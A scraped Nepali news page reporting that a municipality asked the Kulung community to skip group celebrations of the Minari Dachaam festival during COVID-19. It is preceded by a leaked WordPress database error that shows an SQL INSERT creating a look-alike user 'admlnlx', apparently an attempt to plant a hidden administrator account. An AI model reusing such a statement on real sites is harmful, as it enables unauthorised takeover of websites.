WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BH/9nNL5Wi/OOPBFC9WAfbw21q4iE4/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-15 20:22:46', '', 'admlnlx', 'admlnlx')
आदिवासी किरात कुलुहरुको महान चाड मिनारी दाचाम निङदोङ फाइम अथवा नँया वर्ष
कुलुहरुको महान चाड मिनारी दाचाम कुलुहरुको महान चाड मिनारी दाचाम फाइम चाक्चाकुर पर्व विश्व महामारी कोभिड १९ का कारण सामुहिक रुपमा मनाउन तथा भिडभाड नगरिदिन तथा वन्द गर्न सार्वजनिक सुचना जारी गरी गाँउपालिकाको कार्यालयले सुचना निकालेको छ ।
अघिल्लो वर्षहरुमा विभिन्न साँस्कृतिक तथा खेलकुद कार्यक्रम आयोजना गरेर धुमधामका साथ मनाउने गरेकोमा जनस्वस्वास्थ्यलाई मध्यनजर गर्दै मेला भर्न तथा कार्यक्रम गर्न गराउन अपिल गरिएको गाँउपालिकाका अध्यक्ष सागर किँरातीले जानकारी दिनुभयो ।
महाकुलुङ कुलुङहरुको उत्गम थलो पनि हो । कुलुङ जातिहरुको मुख्य पर्व मानिने मिनारी दाचाम चाक्चाकुर परम्परागत रुपमा मान्दै आएता पनि केहि समय देशको विभिन्न राजनीतिक तथा राज्य व्यवश्थाका कारण आफनो परम्परागत पर्व मनाउन पाईरहेको थिएन । तर छरिएर रहेका विभिन्न जिल्लाका पुर्खाहरुको सम्मेलनवाट पारित गरी आधिकारिक रुपमा 2063 सालदेखि भव्य रुपमा मनाउदै आएको छ । कुलुङ जातिहरु सोलुखुम्को महाकुलुङ लगायत सोह जिल्लामा फैलिएर रहेका छन र कुलुङहरुको जम्मा जनसंख्या दुईलाख हाराहारी रहेको अनुमान गरिएको छ ।